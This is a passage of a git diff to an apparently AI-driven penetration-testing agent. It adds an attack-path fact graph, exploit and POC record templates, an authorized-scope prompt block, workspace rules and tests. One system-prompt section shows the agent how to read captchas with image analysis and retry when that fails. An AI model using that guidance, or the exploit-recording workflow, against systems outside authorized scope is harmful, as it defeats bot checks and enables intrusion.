"exploit/sqli") + if err != nil || len(in) != 1 || in[0].SourceFactKey != "finding/sqli_endpoint" { + t.Fatalf("expected persisted edge from finding, got %+v err=%v", in, err) + } +} + +func TestValidateProjectFactEdgeType(t *testing.T) { + t.Parallel() + if err := database.ValidateProjectFactEdgeType("leads_to"); err != nil { + t.Fatal(err) + } + if err := database.ValidateProjectFactEdgeType("invalid"); err == nil { + t.Fatal("expected error") + } +} diff --git a/internal/project/fact_index_links.go b/internal/project/fact_index_links.go new file mode 100644 index 00000000..32732894 --- /dev/null +++ b/internal/project/fact_index_links.go @@ -0,0 +1,231 @@ +package project + +import ( + "fmt" + "sort" + "strings" + + "cyberstrike-ai/internal/database" +) + +var factIndexEdgeTypeOrder = []string{ + "discovered_on", "leads_to", "enables", "depends_on", "exploits", "contains", "part_of", "supports", +} + +func filterIndexEdges(edges []*database.ProjectFactEdge) []*database.ProjectFactEdge { + if len(edges) == 0 { + return nil + } + out := make([]*database.ProjectFactEdge, 0, len(edges)) + for _, e := range edges { + if e == nil { + continue + } + if strings.EqualFold(strings.TrimSpace(e.Confidence), "deprecated") { + continue + } + edgeType := strings.ToLower(strings.TrimSpace(e.EdgeType)) + if _, ok := database.ValidProjectFactEdgeTypes[edgeType]; !ok { + continue + } + out = append(out, e) + } + return out +} + +func edgeConfidenceSuffix(confidence string) string { + c := strings.ToLower(strings.TrimSpace(confidence)) + if c == "" || c == "confirmed" { + return "" + } + return " (" + c + ")" +} + +func formatRelationHintPart(e *database.ProjectFactEdge) string { + return fmt.Sprintf("%s←%s%s", e.EdgeType, e.SourceFactKey, edgeConfidenceSuffix(e.Confidence)) +} + +func formatOutgoingHintPart(e *database.ProjectFactEdge) string { + return fmt.Sprintf("%s→%s%s", e.EdgeType, e.TargetFactKey, edgeConfidenceSuffix(e.Confidence)) +} + +func formatIncomingHintPart(e *database.ProjectFactEdge) string { + return formatRelationHintPart(e) +} + +func joinEdgeHintParts(edges []*database.ProjectFactEdge, formatter func(*database.ProjectFactEdge) string) string { + parts := make([]string, 0, len(edges)) + for _, e := range edges { + parts = append(parts, formatter(e)) + } + return strings.Join(parts, ", ") +} + +// FormatOutgoingLinksHint 黑板索引用出边摘要(全部有效边类型,不截断)。 +func FormatOutgoingLinksHint(edges []*database.ProjectFactEdge) string { + edges = filterIndexEdges(edges) + if len(edges) == 0 { + return "" + } + return " {出边: " + joinEdgeHintParts(edges, formatOutgoingHintPart) + "}" +} + +// FormatIncomingLinksHint 黑板索引用入边摘要(全部有效边类型,不截断)。 +func FormatIncomingLinksHint(edges []*database.ProjectFactEdge) string { + edges = filterIndexEdges(edges) + if len(edges) == 0 { + return "" + } + return " {入边: " + joinEdgeHintParts(edges, formatIncomingHintPart) + "}" +} + +// FormatFactIndexLinksHint 黑板索引行内关系边(from → 当前 fact,与 upsert links 一致)。 +func FormatFactIndexLinksHint(_ string, incoming []*database.ProjectFactEdge) string { + in := filterIndexEdges(incoming) + if len(in) == 0 { + return "" + } + return " {关系边: " + joinEdgeHintParts(in, formatRelationHintPart) + "}" +} + +func indexEdgeGroupMaps(edges []*database.ProjectFactEdge) (outgoing, incoming map[string][]*database.ProjectFactEdge) { + outgoing = map[string][]*database.ProjectFactEdge{} + incoming = map[string][]*database.ProjectFactEdge{} + for _, e := range filterIndexEdges(edges) { + outgoing[e.SourceFactKey] = append(outgoing[e.SourceFactKey], e) + incoming[e.TargetFactKey] = append(incoming[e.TargetFactKey], e) + } + return outgoing, incoming +} + +func relationOverviewLine(e *database.ProjectFactEdge) string { + return fmt.Sprintf("- %s → %s%s · %s", e.SourceFactKey, e.TargetFactKey, edgeConfidenceSuffix(e.Confidence), e.EdgeType) +} + +func indexEdgeSortKey(e *database.ProjectFactEdge) (int, int, string) { + confRank := 0 + if strings.EqualFold(strings.TrimSpace(e.Confidence), "tentative") { + confRank = 1 + } + typeRank := len(factIndexEdgeTypeOrder) + 1 + for i, t := range factIndexEdgeTypeOrder { + if strings.EqualFold(e.EdgeType, t) { + typeRank = i + break + } + } + return confRank, typeRank, e.SourceFactKey + ">" + e.TargetFactKey + ">" + e.EdgeType +} + +func sortIndexOverviewEdges(edges []*database.ProjectFactEdge) { + sort.SliceStable(edges, func(i, j int) bool { + ci, ti, ki := indexEdgeSortKey(edges[i]) + cj, tj, kj := indexEdgeSortKey(edges[j]) + if ci != cj { + return ci < cj + } + if ti != tj { + return ti < tj + } + return ki < kj + }) +} + +// BuildFactPathOverviewSection 生成事实关系速览(全部有效边类型,不含 body)。 +func BuildFactPathOverviewSection(edges []*database.ProjectFactEdge, indexedKeys map[string]struct{}, maxRunes int) string { + if maxRunes <= 0 { + return "" + } + candidates := filterIndexEdges(edges) + if len(candidates) == 0 { + return "" + } + filtered := make([]*database.ProjectFactEdge, 0, len(candidates)) + for _, e := range candidates { + if len(indexedKeys) > 0 { + if _, ok := indexedKeys[e.SourceFactKey]; !ok { + continue + } + if _, ok := indexedKeys[e.TargetFactKey]; !ok { + continue + } + } + filtered = append(filtered, e) + } + if len(filtered) == 0 { + return "" + } + sortIndexOverviewEdges(filtered) + + header := "### 攻击路径(事实关系)\n" + header += "source → target · type(与攻击路径图/库中方向一致;写入时在目标 fact 的 links 用 from 声明来源)\n" + var b strings.Builder + b.WriteString(header) + used := len([]rune(header)) + omitted := 0 + + for _, e := range filtered { + line := relationOverviewLine(e) + "\n" + lineRunes := len([]rune(line)) + if used+lineRunes > maxRunes { + omitted++ + continue + } + b.WriteString(line) + used += lineRunes + } + if omitted > 0 { + extra := fmt.Sprintf("(另有 %d 条关系边未列入,请 get_project_fact 查看完整关系。)\n", omitted) + if used+len([]rune(extra)) <= maxRunes { + b.WriteString(extra) + } + } + if used <= len([]rune(header)) { + return "" + } + return b.String() +} + +func factIndexSortPriority(f *database.ProjectFact) int { + if f == nil { + return 0 + } + score := 0 + if f.Pinned { + score += 1000 + } + c := strings.ToLower(strings.TrimSpace(f.Category)) + switch c { + case FactCategoryTarget: + score += 400 + case FactCategoryFinding, FactCategoryChain: + score += 300 + case FactCategoryExploit, FactCategoryPOC: + score += 250 + case "auth", "infra", "business": + score += 200 + case "note": + score += 50 + default: + key := strings.ToLower(strings.TrimSpace(f.FactKey)) + if strings.HasPrefix(key, "target/") { + score += 400 + } else if strings.HasPrefix(key, "finding/") || strings.HasPrefix(key, "chain/") { + score += 300 + } + } + if strings.EqualFold(strings.TrimSpace(f.Confidence), "confirmed") { + score += 80 + } + return score +} + +func sortFactsForIndex(facts []*database.ProjectFact) { + sort.SliceStable(facts, func(i, j int) bool { + pi, pj := factIndexSortPriority(facts[i]), factIndexSortPriority(facts[j]) + if pi != pj { + return pi > pj + } + return facts[i].UpdatedAt.After(facts[j].UpdatedAt) + }) +} diff --git a/internal/project/fact_index_links_test.go b/internal/project/fact_index_links_test.go new file mode 100644 index 00000000..a5794b9d --- /dev/null +++ b/internal/project/fact_index_links_test.go @@ -0,0 +1,161 @@ +package project + +import ( + "fmt" + "path/filepath" + "strings" + "testing" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +func TestFormatIncomingLinksHint(t *testing.T) { + t.Parallel() + hint := FormatIncomingLinksHint([]*database.ProjectFactEdge{ + {EdgeType: "discovered_on", SourceFactKey: "finding/x", Confidence: "tentative"}, + }) + if !strings.Contains(hint, "入边:") { + t.Fatalf("expected 入边 label: %q", hint) + } + if !strings.Contains(hint, "discovered_on←finding/x") { + t.Fatalf("unexpected hint: %q", hint) + } + if !strings.Contains(hint, "tentative") { + t.Fatalf("expected tentative in hint: %q", hint) + } +} + +func TestFormatIncomingLinksHint_allEdges(t *testing.T) { + t.Parallel() + edges := make([]*database.ProjectFactEdge, 0, 5) + for i := 1; i <= 5; i++ { + edges = append(edges, &database.ProjectFactEdge{ + EdgeType: "discovered_on", + SourceFactKey: fmt.Sprintf("finding/f%d", i), + Confidence: "tentative", + }) + } + hint := FormatIncomingLinksHint(edges) + if strings.Contains(hint, "+") { + t.Fatalf("should not truncate with +N: %q", hint) + } + for i := 1; i <= 5; i++ { + if !strings.Contains(hint, fmt.Sprintf("finding/f%d", i)) { + t.Fatalf("missing edge f%d in hint: %q", i, hint) + } + } +} + +func TestFormatFactIndexLinksHint_incomingOnly(t *testing.T) { + t.Parallel() + in := []*database.ProjectFactEdge{ + {EdgeType: "discovered_on", SourceFactKey: "target/dev", Confidence: "tentative"}, + {EdgeType: "exploits", SourceFactKey: "exploit/rce", Confidence: "confirmed"}, + } + hint := FormatFactIndexLinksHint("finding/sqli", in) + if !strings.Contains(hint, "关系边:") { + t.Fatalf("missing 关系边 label: %q", hint) + } + if !strings.Contains(hint, "discovered_on←target/dev") { + t.Fatalf("missing discovered_on: %q", hint) + } + if !strings.Contains(hint, "exploits←exploit/rce") { + t.Fatalf("missing exploits: %q", hint) + } + if strings.Contains(hint, "出边") || strings.Contains(hint, "入边") { + t.Fatalf("should not use legacy 出边/入边 labels: %q", hint) + } +} + +func TestFormatFactIndexLinksHint_includesAuxiliaryEdgeTypes(t *testing.T) { + t.Parallel() + in := []*database.ProjectFactEdge{{EdgeType: "supports", SourceFactKey: "note/log"}} + hint := FormatFactIndexLinksHint("finding/x", in) + if !strings.Contains(hint, "supports←note/log") { + t.Fatalf("supports edge should be included: %q", hint) + } +} + +func TestBuildFactPathOverviewSection(t *testing.T) { + t.Parallel() + edges := []*database.ProjectFactEdge{ + {EdgeType: "discovered_on", SourceFactKey: "target/dev", TargetFactKey: "finding/sqli", Confidence: "tentative"}, + {EdgeType: "exploits", SourceFactKey: "exploit/rce", TargetFactKey: "finding/sqli", Confidence: "confirmed"}, + {EdgeType: "supports", SourceFactKey: "note/log", TargetFactKey: "finding/sqli"}, + } + keys := map[string]struct{}{ + "target/dev": {}, "finding/sqli": {}, "exploit/rce": {}, "note/log": {}, + } + section := BuildFactPathOverviewSection(edges, keys, 800) + if !strings.Contains(section, "### 攻击路径(事实关系)") { + t.Fatalf("missing header: %q", section) + } + if !strings.Contains(section, "target/dev → finding/sqli") { + t.Fatalf("missing discovered_on line: %q", section) + } + if !strings.Contains(section, "exploit/rce → finding/sqli") { + t.Fatalf("missing exploits line: %q", section) + } + if !strings.Contains(section, "note/log → finding/sqli") { + t.Fatalf("supports edge should be included: %q", section) + } +} + +func TestBuildFactIndexBlock_withLinksAndPathOverview(t *testing.T) { + t.Parallel() + dbPath := filepath.Join(t.TempDir(), "facts.db") + db, err := database.NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + proj, err := db.CreateProject(&database.Project{Name: "path-proj"}) + if err != nil { + t.Fatal(err) + } + _, err = db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: proj.ID, + FactKey: "target/dev", + Category: "target", + Summary: "dev 子域", + Confidence: "confirmed", + }) + if err != nil { + t.Fatal(err) + } + _, err = db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: proj.ID, + FactKey: "finding/sqli", + Category: "finding", + Summary: "时间盲注", + Confidence: "tentative", + }) + if err != nil { + t.Fatal(err) + } + _, err = db.AddProjectFactEdge(proj.ID, database.ProjectFactEdgeInput{ + To: "finding/sqli", + Type: "discovered_on", + }, "target/dev", "") + if err != nil { + t.Fatal(err) + } + + block, err := BuildFactIndexBlock(db, proj.ID, config.ProjectConfig{Enabled: true, FactIndexMaxRunes: 6500, FactIndexPathMaxRunes: 1000}) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(block, "关系边: discovered_on←target/dev") { + t.Fatalf("finding line should include relation hint: %q", block) + } + if !strings.Contains(block, "### 攻击路径(事实关系)") { + t.Fatalf("missing relation overview: %q", block) + } + if !strings.Contains(block, "target/dev → finding/sqli") { + t.Fatalf("missing overview edge: %q", block) + } +} diff --git a/internal/project/fact_recording_prompt.go b/internal/project/fact_recording_prompt.go new file mode 100644 index 00000000..7d986a46 --- /dev/null +++ b/internal/project/fact_recording_prompt.go @@ -0,0 +1,23 @@ +package project + +import "cyberstrike-ai/internal/projectprompt" + +// FactRecordingIncrementalRhythmMarkdown 见 projectprompt。 +func FactRecordingIncrementalRhythmMarkdown(coordinator, subAgent bool) string { + return projectprompt.FactRecordingIncrementalRhythmMarkdown(coordinator, subAgent) +} + +// FactRecordingBlackboardSection 见 projectprompt。 +func FactRecordingBlackboardSection(coordinatorDelegate bool) string { + return projectprompt.FactRecordingBlackboardSection(coordinatorDelegate) +} + +// FactRecordingSubAgentSection 见 projectprompt。 +func FactRecordingSubAgentSection() string { + return projectprompt.FactRecordingSubAgentSection() +} + +// FactRecordingBlackboardSectionMarkdown 见 projectprompt。 +func FactRecordingBlackboardSectionMarkdown(coordinatorDelegate bool) string { + return projectprompt.FactRecordingBlackboardSectionMarkdown(coordinatorDelegate) +} diff --git a/internal/project/fact_template.go b/internal/project/fact_template.go new file mode 100644 index 00000000..c94c819c --- /dev/null +++ b/internal/project/fact_template.go @@ -0,0 +1,135 @@ +package project + +import ( + "fmt" + "strings" + + "cyberstrike-ai/internal/projectprompt" +) + +// 事实 category 常量(写入 upsert_project_fact 的 category 字段)。 +const ( + FactCategoryTarget = "target" + FactCategoryAuth = "auth" + FactCategoryInfra = "infra" + FactCategoryBusiness = "business" + FactCategoryFinding = "finding" + FactCategoryChain = "chain" + FactCategoryExploit = "exploit" + FactCategoryPOC = "poc" + FactCategoryNote = "note" +) + +// RequiresAttackChainBody 判断该事实是否应携带可复现的攻击链 / exploit 详情(写在 body,非仅 summary)。 +func RequiresAttackChainBody(category, factKey string) bool { + c := strings.ToLower(strings.TrimSpace(category)) + switch c { + case FactCategoryFinding, FactCategoryChain, FactCategoryExploit, FactCategoryPOC, "vuln": + return true + } + key := strings.ToLower(strings.TrimSpace(factKey)) + for _, prefix := range []string{"finding/", "chain/", "exploit/", "poc/"} { + if strings.HasPrefix(key, prefix) { + return true + } + } + return false +} + +// IsSparseFactBody 攻击链类事实 body 过短或缺少关键段落时返回 true(软校验,不阻断写入)。 +func IsSparseFactBody(category, factKey, body string) bool { + if !RequiresAttackChainBody(category, factKey) { + return false + } + body = strings.TrimSpace(body) + if body == "" { + return true + } + lower := strings.ToLower(body) + // 至少应包含可复现线索:步骤/请求/命令/代码块 之一 + hasSteps := strings.Contains(lower, "攻击链") || strings.Contains(lower, "## 攻击") || + strings.Contains(lower, "## exploit") || strings.Contains(lower, "## poc") + hasHTTP := strings.Contains(lower, "```http") || strings.Contains(lower, "```bash") || + strings.Contains(lower, "curl ") || strings.Contains(lower, "get ") || strings.Contains(lower, "post ") + hasReq := strings.Contains(lower, "请求") || strings.Contains(lower, "响应") || strings.Contains(lower, "payload") + // 无攻击链/POC/请求等结构线索,视为仅结论性描述(不论长短) + return !(hasSteps || hasHTTP || hasReq) +} + +// FactBodyTemplate 按 category 返回建议的 body Markdown 骨架(供 Agent 填入真实内容)。 +func FactBodyTemplate(category, factKey string) string { + if RequiresAttackChainBody(category, factKey) { + return attackChainFactBodyTemplate + } + return envFactBodyTemplate +} + +const attackChainFactBodyTemplate = `## 结论(可验证,一句话) +<勿仅写「存在漏洞」;写明类型 + 位置 + 触发条件> + +## 目标与入口 +- 目标: +- 入口: <路径 / 接口 / 参数> +- 前置条件: <匿名 / 角色 / Cookie / 其他依赖> + +## 攻击链(逐步可复现) +1. <侦察/发现> +2. <利用/触发> +3. <影响证明(读文件、RCE 回显、越权数据等)> + +## Exploit / POC +### 请求 +` + "```http\n HTTP/1.1\nHost: ...\n...\n\n\n```" + ` + +### 响应 / 现象 +<关键响应片段、状态码、差异点> + +### 命令 / 脚本(如有) +` + "```bash\n\n```" + ` + +## 关键证据 +- <工具输出摘要 / 截图路径 / 会话或消息 ID> + +## 关联 +- related_vulnerability_id: <可选,对应 record_vulnerability 的 id> +- links(upsert 参数): [{ "from": "", "type": "discovered_on|..." }](from → 当前 fact) +- 依赖事实(body 可读镜像): + +## 备注与不确定性 +<待验证假设、环境差异、绕过尝试记录>` + +const envFactBodyTemplate = `## 摘要 +<该事实的核心认知> + +## 细节 +<端口/版本/路径/凭据特征/业务规则等> + +## 来源与证据 +<命令输出、响应片段、发现时间> + +## 关联 +- 相关 fact_key: <可选>` + +// FactRecordingGuidanceBlock 写入系统提示:要求事实沉淀攻击链上下文而非仅结论。 +func FactRecordingGuidanceBlock() string { + return projectprompt.FactRecordingGuidanceBlock() +} + +// SparseBodyWarning 攻击链类事实 body 不足时的工具返回提示(不阻断保存)。 +func SparseBodyWarning(category, factKey string) string { + if !IsSparseFactBody(category, factKey, "") { + return "" + } + return fmt.Sprintf( + "\n\n⚠ 提示:category=%q / fact_key=%q 属于攻击链类事实,但 body 为空或过简。请补充完整攻击链与 POC(参考模板),便于后续审计复现。\n建议 body 骨架:\n%s", + category, factKey, FactBodyTemplate(category, factKey), + ) +} + +// SparseBodyWarningIfNeeded 根据实际 body 判断是否追加警告。 +func SparseBodyWarningIfNeeded(category, factKey, body string) string { + if !IsSparseFactBody(category, factKey, body) { + return "" + } + return SparseBodyWarning(category, factKey) +} diff --git a/internal/project/fact_template_test.go b/internal/project/fact_template_test.go new file mode 100644 index 00000000..172bc0b6 --- /dev/null +++ b/internal/project/fact_template_test.go @@ -0,0 +1,42 @@ +package project + +import ( + "strings" + "testing" +) + +func TestRequiresAttackChainBody(t *testing.T) { + cases := []struct { + cat, key string + want bool + }{ + {"finding", "note/misc", true}, + {"note", "finding/sqli-login", true}, + {"target", "target/primary_domain", false}, + {"auth", "auth/admin_cookie", false}, + {"chain", "x", true}, + {"", "exploit/rce-upload", true}, + } + for _, tc := range cases { + if got := RequiresAttackChainBody(tc.cat, tc.key); got != tc.want { + t.Errorf("RequiresAttackChainBody(%q,%q)=%v want %v", tc.cat, tc.key, got, tc.want) + } + } +} + +func TestIsSparseFactBody(t *testing.T) { + long := strings.Repeat("x", 150) + if !IsSparseFactBody("finding", "finding/x", "") { + t.Error("empty body should be sparse") + } + if !IsSparseFactBody("finding", "finding/x", long) { + t.Error("body without repro clues should be sparse") + } + body := "## 攻击链\n1. step\n## Exploit\n```http\nGET / HTTP/1.1\n```\n" + if IsSparseFactBody("finding", "finding/x", body) { + t.Error("structured body should not be sparse") + } + if IsSparseFactBody("target", "target/x", "") { + t.Error("env fact empty body is ok") + } +} \ No newline at end of file diff --git a/internal/project/scope_block.go b/internal/project/scope_block.go new file mode 100644 index 00000000..e52cf1ea --- /dev/null +++ b/internal/project/scope_block.go @@ -0,0 +1,99 @@ +package project + +import ( + "encoding/json" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" +) + +// projectScopePayload 解析 projects.scope_json(约定字段,可扩展)。 +type projectScopePayload struct { + Targets []string `json:"targets"` + Exclude []string `json:"exclude"` + Notes string `json:"notes"` +} + +// BuildScopeBlock 将项目 scope_json 格式化为 Agent 可读的授权范围块。 +func BuildScopeBlock(proj *database.Project) string { + if proj == nil { + return "" + } + raw := strings.TrimSpace(proj.ScopeJSON) + if raw == "" { + return "" + } + + var payload projectScopePayload + if err := json.Unmarshal([]byte(raw), &payload); err != nil { + return fmt.Sprintf("## 项目测试范围(project: %s)\n(scope_json 非合法 JSON,请人工核对配置)\n```\n%s\n```\n"+ + "仅对明确授权目标执行测试;超出范围须停止并说明。\n", proj.Name, truncateRunes(raw, 800)) + } + + var b strings.Builder + b.WriteString(fmt.Sprintf("## 项目测试范围(project: %s, id: %s)\n", proj.Name, proj.ID)) + b.WriteString("以下为授权边界,**必须遵守**:仅测试列出的 targets,避开 exclude,不得擅自扩大范围。\n") + + if len(payload.Targets) > 0 { + b.WriteString("\n**允许测试(targets)**:\n") + for _, t := range payload.Targets { + t = strings.TrimSpace(t) + if t != "" { + b.WriteString("- " + t + "\n") + } + } + } + if len(payload.Exclude) > 0 { + b.WriteString("\n**明确排除(exclude)**:\n") + for _, t := range payload.Exclude { + t = strings.TrimSpace(t) + if t != "" { + b.WriteString("- " + t + "\n") + } + } + } + if n := strings.TrimSpace(payload.Notes); n != "" { + b.WriteString("\n**说明(notes)**:\n" + n + "\n") + } + if len(payload.Targets) == 0 && len(payload.Exclude) == 0 && strings.TrimSpace(payload.Notes) == "" { + b.WriteString("\n(scope_json 已配置但未识别 targets/exclude/notes 字段,原始内容供参考)\n```json\n") + b.WriteString(truncateRunes(raw, 1200)) + b.WriteString("\n```\n") + } + b.WriteString("\n若目标不在 targets 内或命中 exclude,不得主动扫描/利用;需用户明确扩大授权后再继续。\n") + return b.String() +} + +func truncateRunes(s string, max int) string { + r := []rune(s) + if len(r) <= max { + return s + } + return string(r[:max]) + "…" +} + +// BuildProjectBlackboardBlock 组合测试范围 + 事实黑板索引。 +func BuildProjectBlackboardBlock(db *database.DB, projectID string, cfg config.ProjectConfig) (string, error) { + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return "", nil + } + proj, err := db.GetProject(projectID) + if err != nil { + return "", err + } + parts := []string{} + if scope := strings.TrimSpace(BuildScopeBlock(proj)); scope != "" { + parts = append(parts, scope) + } + index, err := BuildFactIndexBlock(db, projectID, cfg) + if err != nil { + return "", err + } + if strings.TrimSpace(index) != "" { + parts = append(parts, index) + } + return strings.Join(parts, "\n\n"), nil +} diff --git a/internal/project/scope_block_test.go b/internal/project/scope_block_test.go new file mode 100644 index 00000000..11a5a264 --- /dev/null +++ b/internal/project/scope_block_test.go @@ -0,0 +1,40 @@ +package project + +import ( + "strings" + "testing" + + "cyberstrike-ai/internal/database" +) + +func TestBuildScopeBlock_targetsExcludeNotes(t *testing.T) { + proj := &database.Project{ + ID: "p1", + Name: "Acme", + ScopeJSON: `{"targets":["https://app.example.com"],"exclude":["*.cdn.example.com"],"notes":"仅 Web 层"}`, + } + block := BuildScopeBlock(proj) + if !strings.Contains(block, "https://app.example.com") { + t.Fatalf("missing target: %s", block) + } + if !strings.Contains(block, "cdn.example.com") { + t.Fatalf("missing exclude: %s", block) + } + if !strings.Contains(block, "仅 Web 层") { + t.Fatalf("missing notes: %s", block) + } +} + +func TestBuildScopeBlock_empty(t *testing.T) { + if BuildScopeBlock(&database.Project{Name: "X"}) != "" { + t.Fatal("expected empty") + } +} + +func TestBuildScopeBlock_invalidJSON(t *testing.T) { + proj := &database.Project{Name: "X", ScopeJSON: `{not json`} + block := BuildScopeBlock(proj) + if !strings.Contains(block, "非合法 JSON") { + t.Fatalf("unexpected: %s", block) + } +} diff --git a/internal/project/stats.go b/internal/project/stats.go new file mode 100644 index 00000000..b6e1d1b3 --- /dev/null +++ b/internal/project/stats.go @@ -0,0 +1,21 @@ +package project + +import "cyberstrike-ai/internal/database" + +// GetProjectStats 聚合项目统计(含待补全事实数)。 +func GetProjectStats(db *database.DB, projectID string) (*database.ProjectStats, error) { + stats, err := db.GetProjectStatsCounts(projectID) + if err != nil { + return nil, err + } + rows, err := db.ListProjectFactsForSparseCheck(projectID) + if err != nil { + return nil, err + } + for _, r := range rows { + if IsSparseFactBody(r.Category, r.FactKey, r.Body) { + stats.SparseFactCount++ + } + } + return stats, nil +} diff --git a/internal/project/vision_image_prompt.go b/internal/project/vision_image_prompt.go new file mode 100644 index 00000000..12e901fb --- /dev/null +++ b/internal/project/vision_image_prompt.go @@ -0,0 +1,26 @@ +package project + +import "strings" + +// VisionImageSectionMarker 图片分析 section 标题(与 AppendVisionImageAnalysisIfReady 注入一致)。 +const VisionImageSectionMarker = "## 图片分析" + +// VisionImageAnalysisSection 单/多代理共用的图片分析提示(analyze_image;上下文仅保留文字摘要)。 +func VisionImageAnalysisSection() string { + var b strings.Builder + b.WriteString(VisionImageSectionMarker) + b.WriteString("\n\n") + b.WriteString("- 遇到图片文件(截图、验证码、登录页、报告配图)时,若存在工具 analyze_image,请传入服务器上的文件路径进行分析。\n") + b.WriteString("- 不要对二进制图片使用 read_file 指望理解内容;用户消息中「📎 xxx.png: /path」即为可传给 analyze_image 的路径。\n") + b.WriteString("- 验证码类:若已从页面或接口保存为本地图片(如 captcha.png),用 analyze_image,question 写明「只输出验证码字符」;识别失败则刷新验证码后重新保存再识;复杂滑块/行为验证码勿指望单次识图成功。\n") + b.WriteString("- 委派子代理时,若子任务含验证码/截图识读,在 task description 中写明图片路径与期望输出格式。\n") + return b.String() +} + +// AppendVisionImageAnalysisIfReady 仅在 vision.enabled 且 model 已配置时追加图片分析提示。 +func AppendVisionImageAnalysisIfReady(base string, visionReady bool) string { + if !visionReady { + return base + } + return AppendSystemPromptBlock(base, VisionImageAnalysisSection()) +} diff --git a/internal/project/workspace.go b/internal/project/workspace.go new file mode 100644 index 00000000..55a9137d --- /dev/null +++ b/internal/project/workspace.go @@ -0,0 +1,69 @@ +package project + +import ( + "fmt" + "os" + "path/filepath" + "strings" +) + +func sanitizeWorkspacePathSegment(s string) string { + s = strings.TrimSpace(s) + if s == "" { + return "default" + } + s = strings.ReplaceAll(s, string(filepath.Separator), "-") + s = strings.ReplaceAll(s, "/", "-") + s = strings.ReplaceAll(s, "\\", "-") + s = strings.ReplaceAll(s, "..", "__") + if len(s) > 180 { + s = s[:180] + } + return s +} + +// WorkspaceRootDir returns the relative workspace root for downloads and local analysis. +// Project-bound sessions share projects//; otherwise conversations//. +func WorkspaceRootDir(configuredBase, projectID, conversationID string) string { + base := strings.TrimSpace(configuredBase) + if base == "" { + base = filepath.Join("tmp", "workspace") + } + if pid := strings.TrimSpace(projectID); pid != "" { + return filepath.Join(base, "projects", sanitizeWorkspacePathSegment(pid)) + } + conv := strings.TrimSpace(conversationID) + if conv == "" { + conv = "default" + } + return filepath.Join(base, "conversations", sanitizeWorkspacePathSegment(conv)) +} + +// EnsureWorkspace creates the workspace directory and returns its absolute path. +func EnsureWorkspace(root string) (string, error) { + abs, err := filepath.Abs(strings.TrimSpace(root)) + if err != nil { + return "", fmt.Errorf("workspace abs: %w", err) + } + if err := os.MkdirAll(abs, 0o755); err != nil { + return "", fmt.Errorf("workspace mkdir: %w", err) + } + return abs, nil +} + +// BuildWorkspaceBlock instructs the agent to use the session workspace instead of /tmp. +func BuildWorkspaceBlock(absPath string) string { + absPath = strings.TrimSpace(absPath) + if absPath == "" { + return "" + } + return fmt.Sprintf(`## 会话工作目录(下载与本地分析) + +**必须使用以下目录**保存 curl/wget 下载的文件、临时 HTML/JS,以及 read_file/glob/grep 的检索范围: +`+"`%s`"+` + +- **禁止**使用系统 `+"`/tmp`"+` 或其它全局临时目录(多项目/多会话会互窜遗留文件)。 +- 下载示例:`+"`curl -o '%s/page.html' 'https://target/'`"+`;exec 时可将 `+"`workdir`"+` 设为该目录。 +- 读取下载产物或临时分析文件前,用 glob/grep/read_file **限定在该目录**下搜索,勿在 `+"`/tmp`"+` 盲目检索。 +- 当用户询问“当前目录”“项目根目录”或应用自身文件时,优先按服务进程当前工作目录理解;不要把空的会话工作目录误当成项目根目录。`, absPath, absPath) +} diff --git a/internal/project/workspace_test.go b/internal/project/workspace_test.go new file mode 100644 index 00000000..dd62b162 --- /dev/null +++ b/internal/project/workspace_test.go @@ -0,0 +1,58 @@ +package project + +import ( + "os" + "path/filepath" + "strings" + "testing" +) + +func TestWorkspaceRootDirProjectScoped(t *testing.T) { + got := WorkspaceRootDir("", "proj-1", "conv-1") + want := filepath.Join("tmp", "workspace", "projects", "proj-1") + if got != want { + t.Fatalf("got %q want %q", got, want) + } +} + +func TestWorkspaceRootDirConversationScoped(t *testing.T) { + got := WorkspaceRootDir("/data/ws", "", "conv-abc") + want := filepath.Join("/data/ws", "conversations", "conv-abc") + if got != want { + t.Fatalf("got %q want %q", got, want) + } +} + +func TestEnsureWorkspaceCreatesDir(t *testing.T) { + root := filepath.Join(t.TempDir(), "nested", "workspace") + abs, err := EnsureWorkspace(root) + if err != nil { + t.Fatalf("EnsureWorkspace: %v", err) + } + st, err := os.Stat(abs) + if err != nil { + t.Fatalf("Stat: %v", err) + } + if !st.IsDir() { + t.Fatal("expected directory") + } +} + +func TestBuildWorkspaceBlockMentionsPath(t *testing.T) { + block := BuildWorkspaceBlock("/opt/csai/tmp/workspace/projects/p1") + if block == "" { + t.Fatal("expected non-empty block") + } + if !strings.Contains(block, "/opt/csai/tmp/workspace/projects/p1") { + t.Fatalf("block missing path: %s", block) + } + if !strings.Contains(block, "/tmp") { + t.Fatalf("block should warn about /tmp: %s", block) + } + if !strings.Contains(block, "当前目录") || !strings.Contains(block, "服务进程当前工作目录") { + t.Fatalf("block should distinguish current/project dir from workspace: %s", block) + } + if !strings.Contains(block, "不要把空的会话工作目录误当成项目根目录") { + t.Fatalf("block should warn about empty workspace confusion: %s", block) + } +} diff --git a/internal/termout/startup.go b/internal/termout/startup.go new file mode 100644 index 00000000..00209721 --- /dev/null +++ b/internal/termout/startup.go @@ -0,0 +1,67 @@ +package termout + +import ( + "fmt" + "os" + "strings" +) + +// StartupWebUIOptions configures the startup Web UI banner. +type StartupWebUIOptions struct { + Scheme string + Port int + SelfSigned bool + HTTPRedirect bool +} + +// PrintConfigCreated prints a short notice when config.yaml is bootstrapped. +func PrintConfigCreated() { + s := New(os.Stdout) + s.Println("") + s.Println(s.Green("✔ ") + s.Bold("已创建 config.yaml") + s.Dim("(来自 config.example.yaml)")) + s.BlankLine() +} + +// PrintStartupWebUI prints a colored startup banner for the Web UI. +func PrintStartupWebUI(opts StartupWebUIOptions) { + s := New(os.Stdout) + scheme := opts.Scheme + if scheme == "" { + scheme = "http" + } + port := opts.Port + if port <= 0 { + port = 8080 + } + url := fmt.Sprintf("%s://127.0.0.1:%d/", scheme, port) + + s.BlankLine() + s.Println(s.Bold(s.Cyan("CYBERSTRIKE AI")) + s.Dim(" / secure workspace")) + s.Println(s.Dim(strings.Repeat("─", 60))) + s.Println(s.Green("● ONLINE") + " " + s.Bold(s.White(url))) + if opts.SelfSigned { + s.Println(s.Dim(" TLS ") + 